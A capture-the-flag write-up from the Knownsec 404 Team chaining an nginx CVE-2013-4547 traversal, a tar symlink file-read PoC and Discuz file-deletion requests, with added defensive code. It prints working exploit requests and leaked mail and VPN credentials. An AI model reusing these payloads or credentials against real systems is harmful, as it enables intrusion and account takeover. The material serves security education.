Author: Hcamael@Knownsec 404 Team
Published: 2017-10-04
Step 0
First, the .DS_Store information leak. The downloaded file is binary and needs parsing; a quick Google search turns up a parser:
>>> from ds_store import DSStore
>>> with DSStore.open("DS_Store", "r+") as f:
...     for i in f:
...         print i
<admin Iloc>
<admin bwsp>
<admin vSrn>
<config Iloc>
<config bwsp>
<config vSrn>
<includes Iloc>
<includes bwsp>
<includes vSrn>
<index.html Iloc>
<index.php Iloc>
<index.php ptbL>
<index.php ptbN>
<pwnhub Iloc>
<pwnhub bwsp>
<pwnhub vSrn>
<upload Iloc>
<upload bwsp>
<upload vSrn>
Step 1
Per the hint: 2017.10.02 15:45:49 Nginx has had a lot of problems, but it is a good server
My guess was that an NGINX CVE is the intended route.
Then there was the odd detail from the previous step: the last entry is a directory named upload[space], not upload; it has a trailing space.
Searching with these clues turns up a CVE: CVE-2013-4547.
....The challenge has been taken down, so I can't get screenshots.
The payload is: GET upload /../pwnhub/ HTTP/1.1
A browser cannot be used here, because it would normalize the URL to /pwnhub/.
This yields a path: 6c58c8751bca32b9943b34d0ff29bc16/index.php
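CVE-2013-4547 is triggered by a literal, unescaped space in the request target, which is why the payload has to be sent with a raw client rather than a browser; nginx fixed it in 1.4.4 and 1.5.7. As an added example, not part of this writeup, the check below runs over nginx access-log lines and flags request lines that carry that pattern; the log lines are constructed.

```python
import re

# nginx combined log: the quoted request field is the raw request line as received.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')

def inspect_request_line(req):
    """Reasons a request line matches the CVE-2013-4547 pattern; [] if clean."""
    reasons = []
    parts = req.split(" ")
    # A well-formed request line is exactly METHOD SP target SP version.
    if len(parts) != 3:
        reasons.append("unescaped space in request target")
    target = " ".join(parts[1:-1]) if len(parts) >= 3 else req
    # The unescaped space is the trigger; the dot-dot after it is what the
    # payload in the writeup used. Either one alone is worth a look.
    if "/../" in target or target.endswith("/.."):
        reasons.append("dot-dot traversal in target")
    return reasons

def scan_log(lines):
    """Return (client_ip, request_line, reasons) for each suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        reasons = inspect_request_line(m.group("req"))
        if reasons:
            hits.append((m.group("ip"), m.group("req"), reasons))
    return hits

# Constructed sample lines (not real traffic); the second is the writeup's payload,
# the third is the percent-encoded form that nginx normalizes and does not trigger on.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Oct/2017:15:50:01 +0800] "GET /index.php HTTP/1.1" 200 512 "-" "curl/7.54.0"',
    '203.0.113.5 - - [02/Oct/2017:15:50:07 +0800] "GET upload /../pwnhub/ HTTP/1.1" 200 144 "-" "python-requests/2.18.1"',
    '203.0.113.9 - - [02/Oct/2017:15:51:13 +0800] "GET /upload%20/../pwnhub/ HTTP/1.1" 404 0 "-" "curl/7.54.0"',
]
```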
Step 2
6c58c8751bca32b9943b34d0ff29bc16/index.php is a file upload service:
<!DOCTYPE html>
<html>
<head>
<title>你在里面發現了什么? </title>
</head>
<body>
<form action="index.php" method="post" enctype="multipart/form-data">
<input name="upload" type="file" /><br/>
<input type="submit" value="上傳" />
<p>注意:只支持tar!!</p>
<p>更新配置成功,內容如下</p><textarea cols="30" rows="15"></textarea></form>
</body>
</html>
At first I tried uploading all kinds of files. Every upload succeeded, but "config updated" never showed any content, not even for tar files. That had me confused for a while...
Then I noticed that this directory also has a .DS_Store leak:
>>> with DSStore.open("DS_Store", "r+") as f:
...     for i in f:
...         print "|%s|"%i.filename
|index.php|
|untar.py|
There is an untar.py file:
import tarfile
import sys
import uuid
import os

def untar(filename):
    os.chdir('/tmp/pwnhub/')
    t = tarfile.open(filename, 'r')
    for i in t.getnames():
        # Only the member *name* is checked: no '..' and a .cfg extension.
        # The member type is never checked, so a symlink named x.cfg passes.
        if '..' in i or '.cfg' != os.path.splitext(i)[1]:
            return 'error'
        else:
            try:
                t.extract(i, '/tmp/pwnhub/')
            except Exception, e:
                return e
            else:
                # Rename the extracted member to a server-chosen name and return it.
                cfgName = str(uuid.uuid1()) + '.cfg'
                os.rename(i, cfgName)
                return cfgName

if __name__ == '__main__':
    filename = sys.argv[1]
    if not tarfile.is_tarfile(filename):
        exit('error')
    else:
        print untar(filename)
Clearly, a .cfg file has to be packed into a tar:
$ echo "fjwopqafjasdo" > /tmp/test.cfg
$ tar cf /tmp/test.tar /tmp/test.cfg
Upload test.tar, and after "config updated" the content is finally returned.
But how to exploit it stumped me again, until the hint: 2017.10.03 11:24:40 Find a way to turn it into an arbitrary file read, but the flag is not here; treat it as a real penetration test!
Symlinks came to mind. PoC:
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import requests
from bs4 import BeautifulSoup

def upload():
    url = "http://54.223.177.152/6c58c8751bca32b9943b34d0ff29bc16/index.php"
    files = {"upload": ("test.tar", open("/tmp/test.tar", "rb"), "application/x-tar")}
    r = requests.post(url, files=files)
    data = r.content
    # html = BeautifulSoup(data, "lxml")
    # print html.textarea.contents[0]
    print data

def main():
    # Pack a symlink named test.cfg that points at the target path; untar.py
    # only checks the name, so the server-side PHP reads through the link.
    filename = sys.argv[1]
    print filename
    os.system("ln -sf %s /tmp/test.cfg"%filename)
    os.system("tar cf /tmp/test.tar /tmp/test.cfg")
    upload()

if __name__ == '__main__':
    main()
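untar.py validates only the member name, which is why a symlink named test.cfg gets through and the PoC above works. As an added example, not the challenge's or the writeup's code, the hardened replacement below checks the member type, the path and the extension, and writes the data under a server-chosen name; build_tar and run_checks are constructed test helpers. Python 3.12's tarfile extraction filters (filter="data") also refuse such symlinks, but the checks here are explicit so they do not depend on that.

```python
import io
import os
import tarfile
import tempfile
import uuid

def safe_untar_cfg(tar_bytes, dest):
    """Extract exactly one regular .cfg member into dest; return its new name
    or an 'error: ...' string. Unlike untar.py, the member *type* is checked,
    so a symlink or hardlink named x.cfg cannot be used to read other files."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as t:
        members = t.getmembers()
        if len(members) != 1:
            return "error: expected exactly one member"
        m = members[0]
        if not m.isreg():                      # rejects symlinks, hardlinks, dirs, devices
            return "error: not a regular file"
        if os.path.isabs(m.name) or ".." in m.name.split("/"):
            return "error: unsafe path"
        if os.path.splitext(m.name)[1] != ".cfg":
            return "error: not a .cfg"
        data = t.extractfile(m).read()
    # Never reuse the archived name on disk: write under a fresh random name,
    # created exclusively so an existing file (or link) is never followed.
    out = os.path.join(dest, str(uuid.uuid4()) + ".cfg")
    fd = os.open(out, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as dst:
        dst.write(data)
    return os.path.basename(out)

def build_tar(name, data=b"", linkname=None):
    """Constructed test archive with one member: a regular file or a symlink."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as t:
        ti = tarfile.TarInfo(name)
        if linkname is not None:
            ti.type, ti.linkname = tarfile.SYMTYPE, linkname
            t.addfile(ti)
        else:
            ti.size = len(data)
            t.addfile(ti, io.BytesIO(data))
    return buf.getvalue()

def run_checks():
    # Exercise the accept path and the three reject paths in a temp directory.
    dest = tempfile.mkdtemp()
    ok = safe_untar_cfg(build_tar("test.cfg", b"key=value\n"), dest)
    content = open(os.path.join(dest, ok), "rb").read()
    return {
        "accepted": ok.endswith(".cfg") and content == b"key=value\n",
        "symlink": safe_untar_cfg(build_tar("test.cfg", linkname="/etc/passwd"), dest),
        "traversal": safe_untar_cfg(build_tar("../x.cfg", b"a"), dest),
        "extension": safe_untar_cfg(build_tar("x.txt", b"a"), dest),
    }
```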
Step 3
Now at the arbitrary file read stage, I read all sorts of files. As usual I read the files under /proc/self, and found:
$ python 2013_read_file.py /proc/self/mountinfo
<!DOCTYPE html>
<html>
<head>
<title>你在里面發現了什么? </title>
</head>
<body>
<form action="index.php" method="post" enctype="multipart/form-data">
<input name="upload" type="file" /><br/>
<input type="submit" value="上傳" />
<p>注意:只支持tar!!</p>
<p>更新配置成功,內容如下</p><textarea cols="30" rows="15">181 103 0:40 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay/a67f9242dc6db4569b299d14ce4308f2f63624e8387569cbe015cbc973e50a0c/root,upperdir=/var/lib/docker/overlay/ea20e67da7b4415fd04862f8f7a0bef6a2b6ace2f5ec2e664d07cb9b6280bc8c/upper,workdir=/var/lib/docker/overlay/ea20e67da7b4415fd04862f8f7a0bef6a2b6ace2f5ec2e664d07cb9b6280bc8c/work
182 181 0:43 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
238 181 0:44 / /dev rw,nosuid - tmpfs tmpfs rw,mode=755
239 238 0:45 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
240 181 0:46 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
241 240 0:47 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755
242 241 0:22 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd
243 241 0:24 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/blkio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio
244 241 0:25 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/perf_event ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event
245 241 0:26 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/cpu,cpuacct ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu,cpuacct
246 241 0:27 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/pids ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,pids
247 241 0:28 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/freezer ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer
248 241 0:29 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/net_cls,net_prio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,net_cls,net_prio
249 241 0:30 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory
250 241 0:31 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/cpuset ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset
251 241 0:32 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/hugetlb ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb
252 241 0:33 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/devices ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices
253 238 0:42 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
254 181 202:1 /home/ubuntu/Nginx_1.4.2/crontab /etc/crontab rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
255 181 202:1 /home/ubuntu/Nginx_1.4.2/pwnhub /tmp/pwnhub rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
256 181 202:1 /var/lib/docker/containers/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
257 181 202:1 /var/lib/docker/containers/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23/hostname /etc/hostname rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
258 181 202:1 /var/lib/docker/containers/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23/hosts /etc/hosts rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
259 238 0:41 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
260 181 202:1 /home/ubuntu/Nginx_1.4.2/html /usr/local/nginx/html rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
261 238 202:1 /home/ubuntu/Nginx_1.4.2/access.log /dev/stdout rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
262 181 202:1 /home/ubuntu/Nginx_1.4.2/run /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
263 181 202:1 /home/ubuntu/Nginx_1.4.2/nginx.conf /usr/local/nginx/conf/nginx.conf rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
264 181 202:1 /home/ubuntu/Nginx_1.4.2/cron_run.sh /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/cron_run.sh rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
419 181 202:1 /home/ubuntu/Nginx_1.4.2/www.conf /etc/php5/fpm/pool.d/www.conf rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered
104 238 0:45 /0 /dev/console rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
107 182 0:43 /bus /proc/bus ro,relatime - proc proc rw
108 182 0:43 /fs /proc/fs ro,relatime - proc proc rw
109 182 0:43 /irq /proc/irq ro,relatime - proc proc rw
110 182 0:43 /sys /proc/sys ro,relatime - proc proc rw
111 182 0:43 /sysrq-trigger /proc/sysrq-trigger ro,relatime - proc proc rw
112 182 0:44 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,mode=755
113 182 0:44 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,mode=755
114 182 0:44 /null /proc/timer_stats rw,nosuid - tmpfs tmpfs rw,mode=755
115 182 0:44 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,mode=755
132 240 0:48 / /sys/firmware ro,relatime - tmpfs tmpfs ro
</textarea></form>
</body>
</html>
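The value of reading /proc/self/mountinfo here is that the bind-mount records map host files into the container (the cron script, nginx.conf, the PHP-FPM pool config). As an added example, not part of the writeup, this parses the record format and lists the host-path bind mounts, the audit a defender would run inside a container to see what it exposes; the sample records are copied from the output above.

```python
# /proc/self/mountinfo record layout (proc(5)):
#   id parent major:minor root mount_point opts [optional...] - fstype source super_opts
PSEUDO_FS = {"proc", "sysfs", "tmpfs", "cgroup", "cgroup2", "devpts", "mqueue",
             "overlay", "aufs"}

def parse_mountinfo_line(line):
    """Split one mountinfo record into named fields; None if malformed."""
    pre, sep, post = line.partition(" - ")
    pre_f = pre.split()
    post_f = post.split(None, 2)
    if not sep or len(pre_f) < 6 or len(post_f) < 2:
        return None
    return {
        "mount_id": int(pre_f[0]),
        "parent_id": int(pre_f[1]),
        "dev": pre_f[2],
        "root": pre_f[3],            # path *within the source filesystem* that is mounted
        "mount_point": pre_f[4],
        "opts": pre_f[5].split(","),
        "optional": pre_f[6:],
        "fstype": post_f[0],
        "source": post_f[1],
        "super_opts": post_f[2].split(",") if len(post_f) > 2 else [],
    }

def host_bind_mounts(lines):
    """Return (source_path, mount_point, writable) for bind mounts of host paths.

    A bind mount of a single host file or directory has a non-"/" root on a real
    block device (here ext4 on /dev/xvda1, the host root disk, so root is the
    host path). Pseudo filesystems and the overlay rootfs are skipped."""
    found = []
    for line in lines:
        rec = parse_mountinfo_line(line)
        if rec is None or rec["fstype"] in PSEUDO_FS or rec["root"] == "/":
            continue
        found.append((rec["root"], rec["mount_point"], "rw" in rec["opts"]))
    return found

# Sample records copied from the mountinfo output above.
SAMPLE_MOUNTINFO = [
    "182 181 0:43 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw",
    "242 241 0:22 /docker/e31d2f13a2e2d5635994cc152024c3264228513d82590d21557140b641e2ba23 /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd",
    "254 181 202:1 /home/ubuntu/Nginx_1.4.2/crontab /etc/crontab rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered",
    "255 181 202:1 /home/ubuntu/Nginx_1.4.2/pwnhub /tmp/pwnhub rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered",
    "264 181 202:1 /home/ubuntu/Nginx_1.4.2/cron_run.sh /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/cron_run.sh rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered",
    "419 181 202:1 /home/ubuntu/Nginx_1.4.2/www.conf /etc/php5/fpm/pool.d/www.conf rw,relatime - ext4 /dev/xvda1 rw,discard,data=ordered",
]
```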
A script turned up: /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/cron_run.sh
$ python 2013_read_file.py /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/cron_run.sh
/home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/cron_run.sh
tar: Removing leading `/' from member names
<!DOCTYPE html>
<html>
<head>
<title>你在里面發現了什么? </title>
</head>
<body>
<form action="index.php" method="post" enctype="multipart/form-data">
<input name="upload" type="file" /><br/>
<input type="submit" value="上傳" />
<p>注意:只支持tar!!</p>
<p>更新配置成功,內容如下</p><textarea cols="30" rows="15">#\!/bin/bash
cd /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/ && python run.py
</textarea></form>
</body>
</html>
$ python 2013_read_file.py /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/run.py
/home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/run.py
tar: Removing leading `/' from member names
<!DOCTYPE html>
<html>
<head>
<title>你在里面發現了什么? </title>
</head>
<body>
<form action="index.php" method="post" enctype="multipart/form-data">
<input name="upload" type="file" /><br/>
<input type="submit" value="上傳" />
<p>注意:只支持tar!!</p>
<p>更新配置成功,內容如下</p><textarea cols="30" rows="15">#encoding=utf8
from collections import Counter
from mail_send import send_mail
ip = []
statusCode = []
def toDeal(filename):
    with open(filename, 'r') as f:
        logs = f.readlines()
    for log in logs:
        ip.append(log.split()[0])
        statusCode.append(log.split()[8])
    logAll = '日志總數:' + str(len(logs))
    ipUV = '獨立 IP:' + str(list(set(ip)))
    ipNumber = 'IP出現次數:' + str(dict(Counter(ip)))
    codeNumber = '狀態碼出現次數:' + str(dict(Counter(statusCode)))
    content = logAll + '\n' + ipUV + '\n' + ipNumber + '\n' + codeNumber
    send_mail('Pwnhub Nginx Report', content)
if __name__ == '__main__':
    toDeal('/usr/local/var/log/nginx/access.log')
</textarea></form>
</body>
</html>
$ python 2013_read_file.py /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/mail_send.py
/home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/mail_send.py
tar: Removing leading `/' from member names
<!DOCTYPE html>
<html>
<head>
<title>你在里面發現了什么? </title>
</head>
<body>
<form action="index.php" method="post" enctype="multipart/form-data">
<input name="upload" type="file" /><br/>
<input type="submit" value="上傳" />
<p>注意:只支持tar!!</p>
<p>更新配置成功,內容如下</p><textarea cols="30" rows="15">#coding:utf-8
import smtplib
from email.mime.text import MIMEText
mail_user = 'ctf_dicha@21cn.com'
mail_pass = '634DRaC62ehWK6X'
mail_server = 'smtp.21cn.com'
mail_port = 465
to_user = 'wyd0n9@gmail.com'
def send_mail(title,content):
    # create a message instance; html-format mail
    msg = MIMEText(content, _subtype = 'html', _charset = 'utf-8')
    msg['Subject'] = title
    msg['From'] = mail_user
    msg['To'] = to_user
    try:
        # log in to the smtp server
        server = smtplib.SMTP_SSL(mail_server,mail_port)
        server.login(mail_user,mail_pass)
        # send the mail
        server.sendmail(mail_user,to_user,msg.as_string())
        server.quit()
        return True
    except Exception as e:
        print(str(e))
        return False
</textarea></form>
</body>
</html>
Step 4
That gives a mailbox. I tried logging in; the inbox held a bounce for a message about a VPN, and the sent folder contained the VPN details:
IPsec VPN server is now ready for use!
Connect to your new VPN with these details:
Server IP: 54.223.177.152
IPsec PSK: dkQ97gGQPuVm833Ed2F9
Username: pwnhub
Password: LE3U2aTgc4DGZd92wg82
Write these down. You'll need them to connect!
I wanted a Linux GUI client for IPsec but couldn't find one, so I switched to the Mac..
Once the VPN is up, the next step is finding services on the internal network. nmap probing is slow, so I only probed port 80.
After idling for a while, several hosts turned up:
172.17.0.1
172.17.0.3
172.17.0.5
172.17.0.7
172.17.0.9
From this it is clearly Docker: .1 is the container running the external service, and the other port 80s are default nginx pages. Scanning .3 showed 8090 open as well, which fits the later hint: Owning Discuz is not the goal; who says a "useless" bug is useless? Watch Discuz provide the assist.
Step 5
Port 8090 runs Discuz X3.2, so that is the target. I looked up Discuz vulnerabilities and tried them; only the SSRF and the recent arbitrary file deletion worked.
Then I realized I'm too weak at web and couldn't get anywhere with DZ......
Then, by chance, I noticed... port 80 had changed: it was no longer the default nginx page but an HTML page redirecting to index.php. index.php looks like this:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>get flag?</title>
</head>
<!-- include 'safe.php';
if($_REQUEST['passwd'] === 'jiajiajiajiajia'){
echo "$flag";
} -->
</body>
</html>
Oh,Hacked ?
Requesting http://172.17.0.3/index.php?passwd=jiajiajiajiajia fails, of course, because of safe.php.
Based on what I had learned from DZ earlier, I guessed safe.php is an IP filter, and came up with an idea (a wrong one, as it turned out): use the DZ SSRF to request http://127.0.0.1/index.php?passwd=jiajiajiajiajia. Since the DZ SSRF is a remote image download, it saves the response locally; the /data directory is listable, and the file lands under data/attachment/profile/201710/0x.
But the listing stops at 201710, because there is an index.html there. Next idea: use the arbitrary file deletion to remove that index.html. That worked, and the files under data/attachment/profile/201710/04/ became visible. Then I tried the SSRF, but it failed. After a while of source auditing: DZ saves the SSRF response as a file, then tries to read image metadata from it, and deletes the file if that fails.
I considered a race, but the window between save and delete is far too short for a race to be reliable... stuck again.
Then the challenge author changed the challenge in the middle of the night: originally port 80 was nginx and DZ ran on Apache; it became port 80 on Apache and DZ on nginx.
That finished off my earlier idea, since the downloaded file name could no longer be obtained.
Only one idea was left: use DZ's arbitrary file deletion to delete safe.php.
I had thought of this at the start, but it seemed to have too many problems: first, two separate services, so why would one have permission to delete the other's files? safe.php isn't in an upload directory that would be chmod 777. Second, if one person solved it this way, everyone else would too.
Around 2 a.m. I tried deleting safe.php; it failed; I went to sleep. Got up after 9 to find three solves already; tried again; success..................
No PoC written, done by hand. First, keep a Python loop running:
>>> import requests, time
>>> # url3 is safe.php on 172.17.0.3 (404 once it is deleted); url2 is
>>> # index.php?passwd=jiajiajiajiajia. Both assumed from the steps above.
>>> while True:
...     r = requests.get(url3)
...     print r.content
...     if r.status_code == 404:
...         print "right"
...         r = requests.get(url2)
...         print r.content
...     time.sleep(1)
Oh,Hacked ?
Then, with Burp, the first request:
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: 172.17.0.3:8090
Content-Length: 2244
Cache-Control: max-age=0
Origin: http://172.17.0.3:8090
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHL816KVx2cHVmZcq
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://172.17.0.3:8090/home.php?mod=spacecp&ac=profile&op=base
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: 3LFi_2132_saltkey=iAo9aN8L; 3LFi_2132_lastvisit=1507028276; 3LFi_2132_sendmail=1; 3LFi_2132_home_readfeed=1507037399; 3LFi_2132_seccode=19.90700de229cc94ae7e; 3LFi_2132_ulastactivity=5e6dmN2yw6RW9gYAeu0%2BFQj4zPpXufkmFS79DZbibxsS1GKyf30i; 3LFi_2132_auth=e93etvAAYQo0lvRVwL9syLfiWnGnZj7HnZAZRfhXA84VUXaWbScrKrKqleMUclzMt%2FB67ybK%2FTtRoNhg%2FF7V; 3LFi_2132_lastcheckfeed=3%7C1507037417; 3LFi_2132_lip=172.17.0.2%2C1507030640; 3LFi_2132_nofavfid=1; 3LFi_2132_onlineusernum=1; 3LFi_2132_checkpm=1; 3LFi_2132_sid=QGWdpE; 3LFi_2132_lastact=1507037551%09misc.php%09patch
Connection: close
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="formhash"
89dbe522
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="realname"
aklis
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[realname]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="gender"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[gender]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="birthyear"
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="birthmonth"
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="birthday"
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[birthday]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="birthprovince"
../../../../../../../../../usr/share/nginx/html/safe.php
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[birthcity]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="resideprovince"
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[residecity]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="affectivestatus"
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[affectivestatus]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="lookingfor"
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[lookingfor]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="bloodtype"
A
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="privacy[bloodtype]"
0
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="profilesubmit"
true
------WebKitFormBoundaryHL816KVx2cHVmZcq
Content-Disposition: form-data; name="profilesubmitbtn"
true
------WebKitFormBoundaryHL816KVx2cHVmZcq--
Then the second request:
POST /home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaa HTTP/1.1
Host: 172.17.0.3:8090
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.1
Content-Length: 543
Cookie: 3LFi_2132_saltkey=iAo9aN8L; 3LFi_2132_lastvisit=1507028276; 3LFi_2132_home_readfeed=1507037399; 3LFi_2132_ulastactivity=5e6dmN2yw6RW9gYAeu0%2BFQj4zPpXufkmFS79DZbibxsS1GKyf30i; 3LFi_2132_auth=e93etvAAYQo0lvRVwL9syLfiWnGnZj7HnZAZRfhXA84VUXaWbScrKrKqleMUclzMt%2FB67ybK%2FTtRoNhg%2FF7V; 3LFi_2132_lastcheckfeed=3%7C1507037417; 3LFi_2132_nofavfid=1; 3LFi_2132_visitedfid=2; 3LFi_2132_forum_lastvisit=D_2_1507041771; 3LFi_2132_st_p=3%7C1507041805%7C587c0547c79d9aad1865192204c3e348; 3LFi_2132_viewid=tid_1; 3LFi_2132_lip=172.17.0.2%2C1507041386; 3LFi_2132_st_t=3%7C1507042459%7Cec88a27fedbb1c6205e196d933f91e42; 3LFi_2132_editormode_e=1; 3LFi_2132_seccode=47.a0f88955fd6a0cfce9; 3LFi_2132_smile=1D1; 3LFi_2132_onlineusernum=9; 3LFi_2132_checkpm=1; 3LFi_2132_sendmail=1; 3LFi_2132_home_diymode=1; 3LFi_2132_sid=A92w24; 3LFi_2132_lastact=1507046589%09home.php%09misc
Content-Type: multipart/form-data; boundary=2b4ed56c9a8d4dff838f4fba3c258b9b
--2b4ed56c9a8d4dff838f4fba3c258b9b
Content-Disposition: form-data; name="profilesubmit"
1
--2b4ed56c9a8d4dff838f4fba3c258b9b
Content-Disposition: form-data; name="formhash"
89dbe522
--2b4ed56c9a8d4dff838f4fba3c258b9b
Content-Disposition: form-data; name="birthprovince"; filename="a.png"
Content-Type: image/png
PS: a normal image goes here; it contains non-printable characters, so I didn't paste it, and couldn't be bothered to screenshot it....
--2b4ed56c9a8d4dff838f4fba3c258b9b--
And the flag came out:
File not found.
right
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>get flag?</title>
</head>
<!-- include 'safe.php';
if($_REQUEST['passwd'] === 'jiajiajiajiajia'){
echo "$flag";
} -->
</body>
</html>
pwnhub{flag:800eaf3244994b224c30e5f24b59f178}
PS: I rate this challenge a 4. I think the last step is its weak point; setting aside the environment problems, the idea there exists only to make a challenge and has no other meaning.... The earlier steps were all good.
